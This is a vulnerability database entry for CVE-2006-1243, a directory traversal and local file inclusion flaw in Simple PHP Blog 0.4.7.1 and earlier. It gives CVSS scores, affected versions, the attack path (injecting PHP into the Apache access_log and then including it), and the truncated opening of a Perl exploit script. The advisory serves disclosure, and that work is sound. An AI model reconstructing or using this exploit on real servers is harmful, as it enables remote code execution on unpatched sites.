7.5
CVSSv2

CVE-2006-1243

Published: 15/03/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and previous versions allows remote malicious users to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.

Vulnerable Product Search on Vulmon Subscribe to Product

alexander palmo simple php blog 0.4.6

alexander palmo simple php blog 0.4.7

alexander palmo simple php blog 0.4.0

alexander palmo simple php blog 0.4.5

alexander palmo simple php blog

Exploits

#!/usr/bin/perl use IO::Socket; print "Simple PHP Blog <= 0471 cmmnds xctn exploit\r\n"; print "through arbitrary local inclusion\r\n"; print "rgod rgod\@autisticiorg\r\n"; print "-> this works with magic_quotes_gpc = Off\r\n\r\n"; # short explaination: # we have this code in install05php: # <?php # require_once('scripts/sb_function ...